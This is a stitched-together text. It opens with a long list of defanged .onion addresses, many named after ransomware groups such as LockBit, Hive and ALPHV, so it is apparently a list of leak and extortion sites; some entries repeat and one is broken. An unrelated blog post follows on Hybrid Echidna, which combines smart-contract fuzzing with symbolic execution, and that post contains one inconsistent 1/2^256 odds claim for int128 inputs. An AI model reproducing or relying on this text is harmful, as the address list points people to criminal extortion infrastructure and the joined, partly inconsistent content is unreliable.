hxxp://zj2ex44e2b2xi43m2txk4uwi3l55aglsarre7repw7rkfwpj54j46iqd.onion
hxxp://chat5sqrnzqewampznybomgn4hf2m53tybkarxk4sfaktwt7oqpkcvyd.onion
hxxp://vfokxcdzjbpehgit223vzdzwte47l3zcqtafj34qrr26htjo4uf3obid.onion
hxxp://746pbrxl7acvrlhzshosye3b3udk4plurpxt2pp27pojfhkkaooqiiqd.onion
hxxp://ecdmr42a34qovoph557zotkfvth4fsz56twvwgiylstjup4r5bpc4oad.onion
hxxp://ml3mjpuhnmse4kjij7ggupenw34755y4uj7t742qf7jg5impt5ulhkid.onion
hxxp://wmp2rvrkecyx72i3x7ejhyd3yr6fn5uqo7wfus7cz7qnwr6uzhcbrwad.onion
hxxp://ssq4zimieeanazkzc5ld4v5hdibi2nzwzdibfh5n5w4pw5mcik76lzyd.onion
hxxp://mrdxtxy6vqeqbmb4rvbvueh2kukb3e3mhu3wdothqn7242gztxyzycid.onion
hxxp://wj3b2wtj7u2bzup75tzhnso56bin6bnvsxcbwbfcuvzpc4vcixbywlid.onion
hxxp://zeonrefpbompx6rwdqa5hxgtp2cxgfmoymlli3azoanisze33pp3x3yd.onion
hxxp://aazsbsgya565vlu2c6bzy6yfiebkcbtvvcytvolt33s77xypi7nypxyd.onion
hxxp://wemo2ysyeq6km2nqhcrz63dkdhez3j25yw2nvn7xba2z4h7v7gyrfgid.onion
hxxp://doq32rjiuomfghm5a4lyf3lwwakt2774tkv4ppsos6ueo5mhx7662gid.onion
hxxp://lhxxtrqraokn63f3nubhbjrzxkrgduq3qogp3yr424tkpvh3z7n4kcyd.onion
hxxp://omx5iqrdbsoitf3q4xexrqw5r5tfw7vp3vl3li3lfo7saabxazshnead.onion
hxxp://relic5zqwemjnu4veilml6prgyedj6phs7de3udhicuq53z37klxm6qd.onion
hxxp://malwarewrn7fvd7zq243d74dxs3ca4wh5kw6i2opkzeusuoajtd2j5yd.onion
hxxp://rlcjba7wduej3xcstcjo577eqgjsjvcjfsw4i23fqvf2y27ylylhmhad.onion
hxxp://eternityms33k74r7iuuxfda4sqsiei3o3lbtr5cpalf6f4skszpruad.onion
hxxp://dozrkm62j2uysnqg57q35cangl2lpgdirhxbcc2yzpcgvfyowy7syxqd.onion
hxxp://ni3kiymt4jc32baea356vhwurba44jabfklitpoqbrtgrhr5skyrixyd.onion
hxxp://22rnyep2aa2exx3fdm26p4onwjfmhciodb55v5l3w4iny7e5bxpg3yad.onion
hxxp://232fwh5cea3ub6qguz3pynijxfzl2uj3c73nbrayipf3gq25vtq2r4qd.onion
hxxp://2cuqgeerjdba2rhdiviezodpu3lc4qz2sjf4qin6f7std2evleqlzjid.onion
hxxp://37rckgo66iydpvgpwve7b2el5q2zhjw4tv4lmyewufnpx4lhkekxkoqd.onion
hxxp://3f7nxkjway3d223j27lyad7v5cgmyaifesycvmwq7i7cbs23lb6llryd.onion
hxxp://3kp6j22pz3zkv76yutctosa6djpj4yib2icvdqxucdaxxedumhqicpad.onion
hxxp://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion
hxxp://3r6n77mpe737w4sbxxxrpc5phbluv6xhtdl5ujpnlvmck5tc7blq2rqd.onion
hxxp://3slz4povugieoi3tw7sblxoowxhbzxeju427cffsst5fo2tizepwatid.onion
hxxp://4qbxi3i2oqmyzxsjg4fwe4aly3xkped52gq5orp6efpkeskvchqe27id.onion
hxxp://4s4lnfeujzo67fy2jebz2dxskez2gsqj2jeb35m75ktufxensdicqxad.onion
hxxp://54bb47h5qu4k7l4d7v5ix3i6ak6elysn3net4by4ihmvrhu7cvbskoqd.onion
hxxp://54rdhzjzc4ids4u4wata4zr4ywfon5wpz2ml4q3avelgadpvmdal2vqd.onion
hxxp://5mvifa3xq5m7sou3xzaajfz7h6eserp5fnkwotohns5pgbb5oxty3zad.onion
hxxp://6iaj3efye3q62xjgfxyegrufhewxew7yt4scxjd45tlfafyja6q4ctqd.onion
hxxp://746pbrxl7acvrlhzshosye3b3udk4plurpxt2pp27pojfhkkaooqiiqd.onion
hxxp://7iulpt5i6whht6zo2r52f7vptxtjxs3vfcdxxazllikrtqpupn4epnqd.onion
hxxp://7k4yyskpz3rxq5nyokf6ztbpywzbjtdfanweup3skctcxopmt7tq7eid.onion
hxxp://7ukmkdtyxdkdivtjad57klqnd3kdsmq6tp45rrsxqnu76zzv3jvitlqd.onion
hxxp://7ypnbv3snejqmgce4kbewwvym4cm5j6lkzf2hra2hyhtsvwjaxwipkyd.onion
hxxp://aazsbsgya565vlu2c6bzy6yfiebkcbtvvcytvolt33s77xypi7nypxyd.onion
hxxp://aby6efzmp7jzbwgidgqc6ghxi2vwpo6d7eaood5xuoxutrfofsmzcjqd.onion
hxxp://adminavf4cikzbv6mbbp7ujpwhygnn2t3egiz2pswldj32krrml42wyd.onion
hxxp://alphvmmm27o3abo3r2mlmjrpdmzle3rykajqc5xsj7j7ejksbpsa36ad.onion
hxxp://anewset3pcya3xvk73hj7yunuamutxxsm5sohkdi32blhmql55tvgqad.onion
hxxp://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion
hxxp://avosqxh72b5ia23dl5fgwcpndkctuzqvh2iefk5imp3pi5gfhel5klad.onion
hxxp://babydovegkmhbontykziyq7qivwzy33mu4ukqefe4mqpiiwd3wibnjqd.onion
hxxp://bianlianlbc5an4kgnay3opdemgcryg2kpfcbgczopmm3dnbz3uaunad.onion
hxxp://bl4cktorpms2gybrcyt52aakcxt6yn37byb65uama5cimhifcscnqkid.onion
hxxp://blackmax7su6mbwtcyo3xwtpfxpm356jjqrs34y4crcytpw7mifuedyd.onion
hxxp://blog2hkbm6gogpv2b3uytzi3bj5d5zmc4asbybumjkhuqhas355janyd.onion
hxxp://blogxxu75w63ujqarv476otld7cyjkq4yoswzt4ijadkjwvg3vrvd5yd.onion
hxxp://bonacifryrxr4siz6ptvokuihdzmjzpveruklxumflz5thmkgauty2qd.onion
hxxp://cartelirsn5l54ehcbalyyqtfb3j7be2rpvf6ujayaf5qqmg3vlwiayd.onion
hxxp://cartelraqonekult2cxbzzz2ukiff7v6cav3w373uuhenybgqulxm5id.onion
hxxp://ccpyeuptrlatb2piua4ukhnhi7lrxgerrcrj4p2b5uhbzqm2xgdjaqid.onion
hxxp://ce6roic2ykdjunyzazsxmjpz5wsar4pflpoqzntyww5c2eskcp7dq4yd.onion
hxxp://chat5sqrnzqewampznybomgn4hf2m53tybkarxk4sfaktwt7oqpkcvyd.onion
hxxp://continewsnv5otx5kaoje7krkto2qbu3gtqef22mnr7eaxw3y6ncz3ad.onion
hxxp://crkfkmrh4qzbddfrl2axnkvjp5tgwx73d7lq4oycsfxc7pfgbfhtfiid.onion
hxxp://crptd5sv5bdz6hovrbkac6mnp3rt7zij62njsqwh5a6ldd3asxdd22qd.onion
hxxp://cuba4ikm4jakjgmkezytyawtdgr2xymvy6nvzgw5cglswg3si76icnqd.onion
hxxp://darkleakyqmv62eweqwy4dnhaijg4m4dkburo73pzuqfdumcntqdokyd.onion
hxxp://darklmmmfuonklpy6s3tmvk5mrcdi7iapaw6eka45esmoryiiuug6aid.onion
hxxp://darksidc3iux462n6yunevoag52ntvwp6wulaz3zirkmh4cnz6hhj7id.onion
hxxp://darktorhvabc652txfc575oendhykqcllb7bh7jhhsjduocdlyzdbmqd.onion
hxxp://dfpc7yvle5kxmgg6sbcp5ytggy3oeob676bjgwcwhyr2pwcrmbvoilqd.onion
hxxp://dg5fyig37abmivryrxlordrczn6d6r5wzcfe2msuo5mbbu2exnu46fid.onion
hxxp://dgnh6p5uq234zry7qx7bh73hj5ht3jqisgfet6s7j7uyas5i46xfdkyd.onion
hxxp://dlyo7r3n4qy5fzv4645nddjwarj7wjdd6wzckomcyc7akskkxp4glcad.onion
hxxp://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion
hxxp://doq32rjiuomfghm5a4lyf3lwwakt2774tkv4ppsos6ueo5mhx7662gid.onion
hxxp://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion
hxxp://ecdmr42a34qovoph557zotkfvth4fsz56twvwgiylstjup4r5bpc4oad.onion
hxxp://f5uzduboq4fa2xkjloprmctk7ve3dm46ff7aniis66cbekakvksxgeqd.onion
hxxp://fireeye62c3da3fnosymmmcqcty7rl7cjucpbkzaz275a4qs5fgkzhad.onion
hxxp://fl3xpz5bmgzxy4fmebhgsbycgnz24uosp3u4g33oiln627qq3gyw37ad.onion
hxxp://ft4zr2jzlqoyob7yg4fcpwyt37hox3ajajqnfkdvbfrkjioyunmqnpad.onion
hxxp://fvki3hj7uxuirxpeop6chgqoczanmebutznt2mkzy6waov6w456vjuid.onion
hxxp://gamol6n6p2p4c3ad7gxmx3ur7wwdwlywebo2azv3vv5qlmjmole2zbyd.onion
hxxp://gcbejm2rcjftouqbxuhimj5oroouqcuxb2my4raxqa7efkz5bd5464id.onion
hxxp://gg5ryfgogainisskdvh4y373ap3b2mxafcibeh2lvq5x7fx76ygcosad.onion
hxxp://giphvoitymatg4cv7bxqh5dz6sn6bfscywoat4qtslztkomf5lavrayd.onion
hxxp://griefcameifmv4hfr3auozmovz5yi6m3h3dwbuqw7baomfxoxz4qteid.onion
hxxp://gvka2m4qt5fod2fltkjmdk4gxh5oxemhpgmnmtjptms6fkgfzdd62tad.onion
hxxp://hiveapi4nyabjdfz2hxdsr7otrcv6zq6m4rk5i2w7j64lrtny4b7vjad.onion
hxxp://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion
hxxp://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion
hxxp://hl66646wtlp2naoqnhattngigjp5palgqmbwixepcjyq5i534acgqyad.onion
hxxp://hpoo4dosa3x4ognfxpqcrjwnsigvslm7kv6hvmhh2yqczaxy3j6qnwad.onion
hxxp://jbeg2dct2zhku6c2vwnpxtm2psnjo2xnqvvpoiiwr5hxnc6wrp3uhnad.onion
hxxp://jukswsxbh3jsxuddvidrjdvwuohtsy4kxg2axbppiyclomt2qciyfoad.onion
hxxp://jvdamsif53dqjycuozlaye2s47p7xij4x6hzwzwhzrqmv36gkyzohhqd.onion
hxxp://k7kg3jqxang3wh7hnmaiokchk7qoebupfgoik6rha6mjpzwupwtj25yd.onion
hxxp://kbsqoivihgdmwczmxkbovk7ss2dcynitwhhfu5yw725dboqo5kthfaad.onion
hxxp://kf6x3mjeqljqxjznaw65jixin7dpcunfxbbakwuitizytcpzn4iy5bad.onion
hxxp://kwvhrdibgmmpkhkidrby4mccwqpds5za6uo2thcw5gz75qncv7rbhyad.onion
hxxp://l5cjga2ksw6rxumu5l4xxn3cmahhi2irkbwg3amx6ajroyfmfgpfllid.onion
hxxp://leaksv7sroztl377bbohzl42i3ddlfsxopcb6355zc7olzigedm5agad.onion
hxxp://lirncvjfmdhv6samxvvlohfqx7jklfxoxj7xn3fh7qeabs3taemdsdqd.onion
hxxp://lockbit7z2jwcskxpbokpemdxmltipntwlkmidcll2qirbu7ykg46eyd.onion
hxxp://lockbit7z2mmiz3ryxafn5kapbvbbiywsxwovasfkgf5dqqp5kxlajad.onion
hxxp://lockbit7z2og4jlsmdy7dzty3g42eu3gh2sx2b6ywtvhrjtss7li4fyd.onion
hxxp://lockbit7z355oalq4hiy5p7de64l6rsqutwlvydqje56uvevcc57r6qd.onion
hxxp://lockbit7z36ynytxwjzuoao46ck7b3753gpedary3qvuizn3iczhe4id.onion
hxxp://lockbit7z37ntefjdbjextn6tmdkry4j546ejnru5cejeguitiopvhad.onion
hxxp://lockbit7z3azdoxdpqxzliszutufbc2fldagztdu47xyucp25p4xtqad.onion
hxxp://lockbit7z3ddvg5vuez2vznt73ljqgwx5tnuqaa2ye7lns742yiv2zyd.onion
hxxp://lockbit7z3hv7ev5knxbrhsvv2mmu2rddwqizdz4vwfvxt5izrq6zqqd.onion
hxxp://lockbit7z3ujnkhxwahhjduh5me2updvzxewhhc5qvk2snxezoi5drad.onion
hxxp://lockbit7z4bsm63m3dagp5xglyacr4z4bwytkvkkwtn6enmuo5fi5iyd.onion
hxxp://lockbit7z4cgxvictidwfxpuiov4scdw34nxotmbdjyxpkvkg34mykyd.onion
hxxp://lockbit7z4k5zer5fbqi2vdq5sx2vuggatwyqvoodrkhubxftyrvncid.onion
hxxp://lockbit7z4ndl6thsct34yd47jrzdkpnfg3acfvpacuccb45pnars2ad.onion
hxxp://lockbit7z55tuwaflw2c7torcryobdvhkcgvivhflyndyvcrexafssad.onion
hxxp://lockbit7z57mkicfkuq44j6yrpu5finwvjllczkkp2uvdedsdonjztyd.onion
hxxp://lockbit7z5ehshj6gzpetw5kso3onts6ty7wrnneya5u4aj3vzkeoaqd.onion
hxxp://lockbit7z5hwf6ywfuzipoa42tjlmal3x5suuccngsamsgklww2xgyqd.onion
hxxp://lockbit7z5ltrhzv46lsg447o3cx2637dloc3qt4ugd3gr2xdkkkeayd.onion
hxxp://lockbit7z6choojah4ipvdpzzfzxxchjbecnmtn4povk6ifdvx2dpnid.onion
hxxp://lockbit7z6dqziutocr43onmvpth32njp4abfocfauk2belljjpobxyd.onion
hxxp://lockbit7z6f3gu6rjvrysn5gjbsqj3hk3bvsg64ns6pjldqr2xhvhsyd.onion
hxxp://lockbit7z6qinyhhmibvycu5kwmcvgrbpvtztkvvmdce5zwtucaeyrqd.onion
hxxp://lockbit7z6rzyojiye437jp744d4uwtff7aq7df7gh2jvwqtv525c4yd.onion
hxxp://lockbitapt2d73krlbewgv27tquljgxr33xbwwsp6rkyieto7u4ncead.onion
hxxp://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion
hxxp://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion
hxxp://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnl idyvd7qd.onion
hxxp://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion
hxxp://lockbitapt72iw55njgnqpymggskg5yp75ry7rirtdg4m7i42artsbqd.onion
hxxp://lockbitaptawjl6udhpd323uehekiyatj6ftcxmkwe5sezs4fqgpjpid.onion
hxxp://lockbitaptbdiajqtplcrigzgdjprwugkkut63nbvy2d5r4w2agyekqd.onion
hxxp://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion
hxxp://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion
hxxp://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion
hxxp://lockbitfile2tcudkcqqt2ve6btssyvqwlizbpv5vz337lslmhff2uad.onion
hxxp://lockbitnotexk2vnf2q2zwjefsl3hjsnk4u74vq4chxrqpjclfydk4ad.onion
hxxp://lockbitsupa7e3b4pkn4mgkgojrl5iqgx24clbzc4xm7i6jeetsia3qd.onion
hxxp://lockbitsupdwon76nzykzblcplixwts4n4zoecugz2bxabtapqvmzqqd.onion
hxxp://lockbitsupn2h6be2cnqpvncyhj4rgmnwn44633hnzzmtxdvjoqlp7yd.onion
hxxp://lockbitsupo7vv5vcl3jxpsdviopwvasljqcstym6efhh6oze7c6xjad.onion
hxxp://lockbitsupq3g62dni2f36snrdb4n5qzqvovbtkt5xffw3draxk6gwqd.onion
hxxp://lockbitsupqfyacidr6upt6nhhyipujvaablubuevxj6xy3frthvr3yd.onion
hxxp://lockbitsupt7nr3fa6e7xyb73lk6bw6rcneqhoyblniiabj4uwvzapqd.onion
hxxp://lockbitsupuhswh4izvoucoxsbnotkmgq6durg7kficg6u33zfvq3oyd.onion
hxxp://lockbitsupxcjntihbmat4rrh7ktowips2qzywh6zer5r3xafhviyhqd.onion
hxxp://lorenzmlwpzgxq736jzseuterytjueszsvznuibanxomlpkyxk6ksoyd.onion
hxxp://matmq3z3hiovia3voe2tix2x54sghc3tszj74xgdy4tqtypoycszqzqd.onion
hxxp://mbrlkbtq5jonaqkurjwmxftytyn2ethqvbxfu4rgjbkkknndqwae6byd.onion
hxxp://mhdehvkomeabau7gsetnsrhkfign4jgnx3wajth5yb5h6kvzbd72wlqd.onion
hxxp://midasbkic5eyfox4dhnijkzc7v7e4hpmsb2qgux7diqbpna4up4rtdad.onion
hxxp://ml3mjpuhnmse4kjij7ggupenw34755y4uj7t742qf7jg5impt5ulhkid.onion
hxxp://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion
hxxp://mrdxtxy6vqeqbmb4rvbvueh2kukb3e3mhu3wdothqn7242gztxyzycid.onion
hxxp://msaoyrayohnp32tcgwcanhjouetb5k54aekgnwg7dcvtgtecpumrxpqd.onion
hxxp://n3twormruynhn3oetmxvasum2miix2jgg56xskdoyihra4wthvlgyeyd.onion
hxxp://nalr2uqsave7y2r235am5jsfiklfjh5h4jc5nztu3rzvmhklwt5j6kid.onion
hxxp://nclen75pwlgebpxpsqhlcnxsmdvpyrr7ogz36ehhatfmkvakeyden6ad.onion
hxxp://nq4zyac4ukl4tykmidbzgdlvaboqeqsemkp4t35bzvjeve6zm2lqcjid.onion
hxxp://obzuqvr5424kkc4unbq2p2i67ny3zngce3tbdr37nicjqesgqcgomfqd.onion
hxxp://omegalock5zxwbhswbisc42o2q2i54vdulyvtqqbudqousisjgc7j7yd.onion
hxxp://omx5iqrdbsoitf3q4xexrqw5r5tfw7vp3vl3li3lfo7saabxazshnead.onion
hxxp://oyarbnujct53bizjguvolxou3rmuda2vr72osyexngbdkhqebwrzsnad.onion
hxxp://ozsxj4hwxub7gio347ac7tyqqozvfioty37skqilzo2oqfs4cw2mgtyd.onion
hxxp://pay2key2zkg7arp3kv3cuugdaqwuesifnbofun4j6yjdw5ry7zw2asid.onion
hxxp://pysa2bitc5ldeyfak4seeruqymqs4sj5wt5qkcq7aoyg4h2acqieywad.onion
hxxp://qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion
hxxp://qkbbaxiuqqcqb5nox4np4qjcniy2q6m7yeluvj7n5i5dn7pgpcwxwfid.onion
hxxp://quantum445bh3gzuyilxdzs5xdepf3b7lkcupswvkryf3n7hgzpxebid.onion
hxxp://r6d636w47ncnaukrpvlhmtdbvbeltc6enfcuuow3jclpmyga7cz374qd.onion
hxxp://ramp4u5iz4xx75vmt6nk5xfrs5mrmtokzszqxhhkjqlk7pbwykaz7zid.onion
hxxp://rampjcdlqvgkoz5oywutpo6ggl7g6tvddysustfl6qzhr5osr24xxqqd.onion
hxxp://ranionv3j2o7wrn3um6de33eccbchhg32mkgnnoi72enkpp7jc25h3ad.onion
hxxp://ransomocmou6mnbquqz44ewosbkjk3o5qjsl3orawojexfook2j7esad.onion
hxxp://rbvuetuneohce3ouxjlbxtimyyxokb4btncxjbo44fbgxqy7tskinwad.onion
hxxp://relic5zqwemjnu4veilml6prgyedj6phs7de3udhicuq53z37klxm6qd.onion
hxxp://rgleaktxuey67yrgspmhvtnrqtgogur35lwdrup4d3igtbm3pupc4lyd.onion
hxxp://rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion
hxxp://rnsm777cdsjrsdlbs4v5qoeppu3px6sb2igmh53jzrx7ipcrbjz5b2ad.onion
hxxp://royal2xthig3ou5hd7zsliqagy6yygk2cdelaxtni2fyad6dpmpxedid.onion
hxxp://royal4ezp7xrbakkus3oofjw6gszrohpodmdnfbe5e4w3og5sm7vb3qd.onion
hxxp://rwiajgajdr4kzlnrj5zwebbukpcbrjhupjmk6gufxv6tg7myx34iocad.onion
hxxp://santat7kpllt6iyvqbr7q4amdv6dzrh6paatvyrzl7ry3zm72zigf4ad.onion
hxxp://sbc2zv2qnz5vubwtx3aobfpkeao6l4igjegm3xx7tk5suqhjkp5jxtqd.onion
hxxp://solidb2jco63vbhx4sfimnqmwhtdjk4jbbgq7a24cmzzkfse4rduxgid.onion
hxxp://spookuhvfyxzph54ikjfwf2mwmxt572krpom7reyayrmxbkizbvkpaid.onion
hxxp://ssq4zimieeanazkzc5ld4v5hdibi2nzwzdibfh5n5w4pw5mcik76lzyd.onion
hxxp://stniiomyjliimcgkvdszvgen3eaaoz55hreqqx6o77yvmpwt7gklffqd.onion
hxxp://sushlnty2j7qdzy64qnvyb6ajkwg7resd3p6agc2widnawodtcedgjid.onion
hxxp://t2tqvp4pctcr7vxhgz5yd5x4ino5tw7jzs3whbntxirhp32djhi7q3id.onion
hxxp://tdoe2fiiamwkiadhx2a4dfq56ztlqhzl2vckgwmjtoanfaya4kqvvvyd.onion
hxxp://u67aylig7i6l657wxmp274eoilaowhp3boljowa6bli63rxyzfzsbtyd.onion
hxxp://vbfqeh5nugm6r2u2qvghsdxm3fotf5wbxb5ltv6vw77vus5frdpuaiid.onion
hxxp://vbmisqjshn4yblehk2vbnil53tlqklxsdaztgphcilto3vdj4geao5qd.onion
hxxp://veqlxhq7ub5qze3qy56zx2cig2e6tzsgxdspkubwbayqije6oatma6id.onion
hxxp://vfokxcdzjbpehgit223vzdzwte47l3zcqtafj34qrr26htjo4uf3obid.onion
hxxp://vqifktlreqpudvulhbzmc5gocbeawl67uvs2pttswemdorbnhaddohyd.onion
hxxp://vsociethok6sbprvevl4dlwbqrzyhxcxaqpvcqt5belwvsuxaxsutyad.onion
hxxp://wavbeudogz6byhnardd2lkp2jafims3j7tj6k6qnywchn2csngvtffqd.onion
hxxp://wemo2ysyeq6km2nqhcrz63dkdhez3j25yw2nvn7xba2z4h7v7gyrfgid.onion
hxxp://wj3b2wtj7u2bzup75tzhnso56bin6bnvsxcbwbfcuvzpc4vcixbywlid.onion
hxxp://wm6mbuzipviusuc42kcggzkdpbhuv45sn7olyamy6mcqqked3waslbqd.onion
hxxp://wmp2rvrkecyx72i3x7ejhyd3yr6fn5uqo7wfus7cz7qnwr6uzhcbrwad.onion
hxxp://wobpitin77vdsdiswr43duntv6eqw4rvphedutpaxycjdie6gg3binad.onion
hxxp://ws3dh6av66sjbxxkjpw5ao3wqzmtejnkzheswm4dz5rrwvular7xvkqd.onion
hxxp://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion
hxxp://x2miyuiwpib2imjr5ykyjngdu7v6vprkkhjltrk4qafymtawey4qzwid.onion
hxxp://xembshruusobgbvxg4tcjs3jpdnks6xrr6nbokfxadcnlc53yxir22ad.onion
hxxp://xfr3txoorcyy7tikjgj5dk3rvo3vsrpyaxnclyohkbfp3h277ap4tiad.onion
hxxp://xingnewj6m4qytljhfwemngm7r7rogrindbq7wrfeepejgxc3bwci7qd.onion
hxxp://xqkz2rmrqkeqf6sjbrb47jfwnqxcd4o2zvaxxzrpbh2piknms37rw2ad.onion
hxxp://xw7au5pnwtl6lozbsudkmyd32n6gnqdngitjdppybudan3x3pjgpmpid.onion
hxxp://yeuajcizwytgmrntijhxphs6wn5txp2prs6rpndafbsapek3zd4ubcid.onion
hxxp://yq43odyrmzqvyezdindg2tokgogf3pn6bcdtvgczpz5a74tdxjbtk2yd.onion
hxxp://z6mikrtphid5fmn52nbcbg25tj57sowlm3oc25g563yvsfmygkcxqbyd.onion
hxxp://z6vidveub2ypo3d3x7omsmcxqwxkkmvn5y3paoufyd2tt4bfbkg33kid.onion
hxxp://z6wkgghtoawog5noty5nxulmmt2zs7c3yvwr22v4czbffdoly2kl4uad.onion
hxxp://zeonrefpbompx6rwdqa5hxgtp2cxgfmoymlli3azoanisze33pp3x3yd.onion
hxxp://zj2ex44e2b2xi43m2txk4uwi3l55aglsarre7repw7rkfwpj54j46iqd.onion
hxxp://zjoxyw5mkacojk5ptn2iprkivg5clow72mjkyk5ttubzxprjjnwapkad.onion
hxxp://zohlm7ahjwegcedoz7lrdrti7bvpofymcayotp744qhx6gjmxbuo2yid.onion
hxxp://zqaflhty5hyziovsxgqvj2mrz5e5rs6oqxzb54zolccfnvtn5w2johad.onion

Stay tuned!

Hybrid fuzzing: Sharpening the spikes of Echidna

By Tom Malcolm, University of Queensland, Australia

Smart contract fuzzing is an effective bug-finding technique that is used extensively at Trail of Bits during audits. During my internship at Trail of Bits, I contributed to expanding our fuzzing capabilities by working on Hybrid Echidna, a "hybrid fuzzer" that couples our smart contract fuzzer, Echidna, with our symbolic execution framework, Maat, to improve the process of finding bugs. While Echidna is a great tool, it still struggles to discover some bugs. With Hybrid Echidna, we enhance the process to find even more!

Echidna is a property-based fuzzer built by Trail of Bits that is widely used in smart contract bug hunting. (See its README for a list of notable uses of Echidna and some of the vulnerabilities it has found.) It lies in the category of "smart fuzzers," which use the ABI of a contract and perform static analysis of its source code to decide how best to generate input data. In this post, we'll look at an example of a contract with bugs that can be triggered only by very specific 256-bit integer inputs (e.g. 0xee250cacdb8de774585208b1e85445fca3bd09da95683133ed06742b71ec2434). We will first show how Echidna, which relies on random fuzzing techniques, struggles to discover the bugs. We'll then examine how Hybrid Echidna improves upon traditional random fuzzing and see the results for ourselves!

The problem

The following contract contains two bugs (represented as assertion failures). Triggering the bugs requires finding inputs consisting of specific 256-bit integers, which are not hardcoded into the contract's code. The chance of hitting the right input at random is on the order of 1/115792089237316195423570985008687907853269984665640564039457584007913129639936, i.e. 1/2^256 (each condition actually accepts a small range of values, so the true odds are a little better, but still far beyond the reach of random guessing), which means the bugs are effectively impossible to find by relying on random fuzzing alone.
  pragma solidity ^0.7.1;

  contract VulnerableContract {
      function func_one(int128 x) public pure {
          if (x / 4 == -20) {
              assert(false); // BUG
          }
      }

      function func_two(int128 x) public pure {
          if ((x >> 30) / 7 == 2) {
              assert(false); // BUG
          }
      }
  }

When we run Echidna on the contract (by executing the command echidna VulnerableContract.sol --test-mode assertion), it locally saves certain information about its findings. A summary is displayed in the friendly ncurses-esque interface that it greets us with, as shown below:

Although Echidna identified three "interesting" inputs and added them to the fuzzing corpus, none of them resulted in an assertion failure (i.e., a bug). In other words, Echidna failed to trigger the bugs in the contract. What happened is that Echidna couldn't find inputs that would meet the conditions required to reach the buggy execution paths. This is understandable, as the bug conditions are arithmetic equations, and Echidna can only be so smart when it comes to solving such equations. Looking at the coverage files generated by Echidna, we can clearly see the code paths that weren't covered (in Echidna's coverage output, * marks a line that was executed and r one that reverted; the unmarked assert(false) lines were never reached):

    | pragma solidity ^0.7.1;
  *r|
    | contract VulnerableContract {
    |
  * |     function func_one(int128 x) public pure {
  * |         if (x / 4 == -20) {
    |             assert(false); // BUG
    |         }
    |     }
    |
  * |     function func_two(int128 x) public pure {
  * |         if ((x >> 30) / 7 == 2) {
    |             assert(false); // BUG
    |         }
    |     }
    | }

Echidna can successfully find bugs (and has on many occasions), and at the end of the day, a bug found is a bug found. However, as this example shows, its results could be improved. How, you ask? Well, if only there were a mutation of the tool, some Frankenstein version that combined Echidna with something that could sharpen its ability, forming one super bug-finder: something like a Hybrid Echidna.
Hybrid Echidna to the rescue

Note: If you'd like to follow along here, install the Optik suite of tools by running the following command:

  pip install optik-tools

Hybrid Echidna is part of Optik, a new suite of tools for analysis of Ethereum smart contracts. Optik is intended to comprise both standalone tools and tools that improve upon existing ones (typically fuzzers) for dynamically analyzing smart contracts. So far, its sole tool is Hybrid Echidna, which improves upon Echidna by coupling it with Maat, a symbolic execution framework also developed in-house by Trail of Bits. At the beginning of the summer, the Hybrid Echidna codebase was a minimal one that simply ran Echidna. Now, Hybrid Echidna is a complete tool (albeit one still under development) that consistently improves upon Echidna.

How does it work? At a high level, Hybrid Echidna simply runs Echidna multiple times, interleaving those runs with symbolic analysis to generate new fuzzing inputs. In more depth, the process for fuzzing a contract now looks like this:
  1. Execute an initial run of Echidna to collect a fuzzing corpus.
  2. For every unique input that is found, symbolically execute the contract with that input and record its coverage.
  3. Review the coverage information for any missed paths.
  4. Use Maat to solve inputs for those paths, and record any new inputs that would lead to the execution of a missed path.
  5. Repeat the process until there are no more inputs that can be found.
So Hybrid Echidna takes the data that Echidna finds, uses Maat to figure out how to change its input to reach difficult paths, and then fuzzes the program again (with the newfound inputs) until it can't improve upon the findings. Think of Echidna as a contestant on Who Wants to Be a Millionaire?: when Echidna needs a hand, it can "phone a friend" in Maat (and make an unlimited number of calls).

Show me!

Let's revisit the contract we looked at earlier, the one with two bugs that Echidna overlooked, and see how Hybrid Echidna fares. We use the following command to run Hybrid Echidna:

  hybrid-echidna VulnerableContract.sol --test-mode assertion --corpus-dir hybrid_echidna_output --contract VulnerableContract

Upon running Hybrid Echidna, we are greeted with another friendly UI that provides insight into its performance. This includes timing information and the following key takeaways:
  • Hybrid Echidna found seven unique inputs (five through fuzzing and two through symbolic execution).
  • Two of those inputs resulted in assertion failures (i.e., bugs).
  • The assertion failures occurred in the func_one and func_two functions.
We can quickly verify the inputs that triggered these failures (which are shown in the "Results" section). Take Hybrid Echidna's input to func_two, 15032385536, and recall that a result of 2 for (x >> 30) / 7 indicates an assertion failure:

  $ python -c 'print((15032385536 >> 30) // 7)'
  2

As we can see, Hybrid Echidna found an input that meets the very specific condition in func_two, improving upon Echidna's performance. In other words, it found more bugs!

What's next?

Despite its current limitations (such as its lack of support for symbolic keccak operations and its inability to account for gas usage), we are already seeing promising results with Hybrid Echidna. These results reinforce our confidence in our approach to fuzzing and make us hopeful that we'll have even more exciting results to share in the future. Optik is still under active development. Going forward, we plan to improve the project's symbolic executor and, more importantly, increase Hybrid Echidna's scalability by testing it on real-world codebases. Our end goal is for every engineer at Trail of Bits to use Hybrid Echidna when auditing smart contracts. Try installing Optik and testing out Hybrid Echidna on the VulnerableContract.sol example (or on your own contracts), and let us know what you think!
